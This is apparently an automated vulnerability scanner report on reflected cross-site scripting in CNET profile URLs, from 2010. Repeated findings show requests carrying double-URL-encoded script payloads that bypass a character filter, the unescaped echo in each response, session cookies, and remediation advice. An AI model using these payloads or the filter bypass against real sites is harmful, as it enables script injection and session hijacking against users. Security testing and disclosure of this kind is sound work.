GET /profile/Nicole+Leeaae89%253cscript%253ealert%25281%2529%253c%252fscript%253e80beff7c63a/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:14:43 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:14:43 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=949 Connection: Keep-Alive Content-Length: 31056
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>Nicole Leeaae89<script>alert(1)</script>80beff7c63a's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2e66%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e923dc9d2e2f was submitted in the REST URL parameter 2. This input was echoed as c2e66"><script>alert(1)</script>923dc9d2e2f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/Nicole+Leec2e66%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e923dc9d2e2f/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:14:41 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:14:42 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=991 Connection: Keep-Alive Content-Length: 31138
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="Nicole Leec2e66"><script>alert(1)</script>923dc9d2e2f"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 279b7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e90930d442de was submitted in the REST URL parameter 2. This input was echoed as 279b7"><script>alert(1)</script>90930d442de in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/Peter+N.+Glaskowsky279b7%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e90930d442de/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:15:13 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:15:13 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=983 Connection: Keep-Alive Content-Length: 31206
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="Peter N. Glaskowsky279b7"><script>alert(1)</script>90930d442de"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b895b%253cscript%253ealert%25281%2529%253c%252fscript%253edc764dbbadd was submitted in the REST URL parameter 2. This input was echoed as b895b<script>alert(1)</script>dc764dbbadd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/Peter+N.+Glaskowskyb895b%253cscript%253ealert%25281%2529%253c%252fscript%253edc764dbbadd/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:15:15 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:15:15 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=980 Connection: Keep-Alive Content-Length: 31240
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>Peter N. Glaskowskyb895b<script>alert(1)</script>dc764dbbadd's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8362a%253cscript%253ealert%25281%2529%253c%252fscript%253e8404cc657ee was submitted in the REST URL parameter 2. This input was echoed as 8362a<script>alert(1)</script>8404cc657ee in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/SJ25718362a%253cscript%253ealert%25281%2529%253c%252fscript%253e8404cc657ee/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:15:44 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:15:44 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=981 Connection: Keep-Alive Content-Length: 30994
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>SJ25718362a<script>alert(1)</script>8404cc657ee's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ada9b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5fe361ba10f was submitted in the REST URL parameter 2. This input was echoed as ada9b"><script>alert(1)</script>5fe361ba10f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/SJ2571ada9b%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5fe361ba10f/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:15:43 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:15:43 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=962 Connection: Keep-Alive Content-Length: 31096
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="SJ2571ada9b"><script>alert(1)</script>5fe361ba10f"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 23a8f%253cscript%253ealert%25281%2529%253c%252fscript%253e2ff2330792d was submitted in the REST URL parameter 2. This input was echoed as 23a8f<script>alert(1)</script>2ff2330792d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/ScottStein823a8f%253cscript%253ealert%25281%2529%253c%252fscript%253e2ff2330792d/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:14:33 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:14:33 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=931 Connection: Keep-Alive Content-Length: 31107
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>ScottStein823a8f<script>alert(1)</script>2ff2330792d's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37a10%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e71af06dbc33 was submitted in the REST URL parameter 2. This input was echoed as 37a10"><script>alert(1)</script>71af06dbc33 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/ScottStein837a10%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e71af06dbc33/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:14:31 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:14:31 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=965 Connection: Keep-Alive Content-Length: 31073
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="ScottStein837a10"><script>alert(1)</script>71af06dbc33"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5325f%253cscript%253ealert%25281%2529%253c%252fscript%253e784fb60e8be was submitted in the REST URL parameter 2. This input was echoed as 5325f<script>alert(1)</script>784fb60e8be in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/Shankland5325f%253cscript%253ealert%25281%2529%253c%252fscript%253e784fb60e8be/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:09:18 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:09:18 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=989 Connection: Keep-Alive Content-Length: 31046
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <li>Shankland5325f<script>alert(1)</script>784fb60e8be's community profile</li> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1a18%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed1a5ee1e175 was submitted in the REST URL parameter 2. This input was echoed as c1a18"><script>alert(1)</script>d1a5ee1e175 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/Shanklandc1a18%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ed1a5ee1e175/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:09:17 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:09:17 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=954 Connection: Keep-Alive Content-Length: 31054
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="Shanklandc1a18"><script>alert(1)</script>d1a5ee1e175"/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cdcfe%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec80dca6c587 was submitted in the REST URL parameter 2. This input was echoed as cdcfe"><script>alert(1)</script>c80dca6c587 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /profile/TheAudiophiliaccdcfe%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ec80dca6c587/ HTTP/1.1 Host: www.cnet.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: arrowBiChecked=true; JSESSIONID=abcc8RN0z22AsfV6QhxXs; 23769548261798321310966032894354_tt_machines=false; purs_1=408616ffaa6dc85fdce8f7e2dbfb5ed14ce319f523769548261798321310966032894354!e18!0117/UmruvRN6MnTHX!Lr93EaNIfXMOGyBFnUgqrMxf5%2FJ7qf69ged%2BnTDrYpB15nBBulBhXg%3D%3D; arrowFdCounter=-1; arrowHtcUser=false; surs_1=14590b59edc7ec098500f9832822d82c4ce319f523769548261798321310966032894354!0!0117/UmruvRN6MnTHX!IYd%2FUeugYqA%3D; globid=1.17/UmruvRN6MnTHX; mad_rsi_segs=; urs_sessionId=8b23c37e-5e3f-40ba-ba03-450188845ebe; XCLGFbrowser=Cg8IMEzjGeJNAAAAqCw; rbSessionId=Cg5gq0zjGeWued4SFGU; cnet_joinCallout=true; curs_fb_linked=false; arrowLat=1289951895018; arrowTmUser=false; arrowSpc=7; arrowLnUser=false; tempSessionId=Cg5gpEzjGeGued4SIEE;
Response
HTTP/1.1 200 OK Date: Wed, 17 Nov 2010 00:16:21 GMT Content-Language: en Expires: Wed, 17 Nov 2010 00:16:22 GMT Edge-Control: no-cache Content-Type: text/html; charset=ISO-8859-1 P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA" Cache-Control: no-cache Keep-Alive: timeout=15, max=991 Connection: Keep-Alive Content-Length: 31213
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol. ...[SNIP]... <input type="hidden" name="profileName" value="TheAudiophiliaccdcfe"><script>alert(1)</script>c80dca6c587"/> ...[SNIP]...
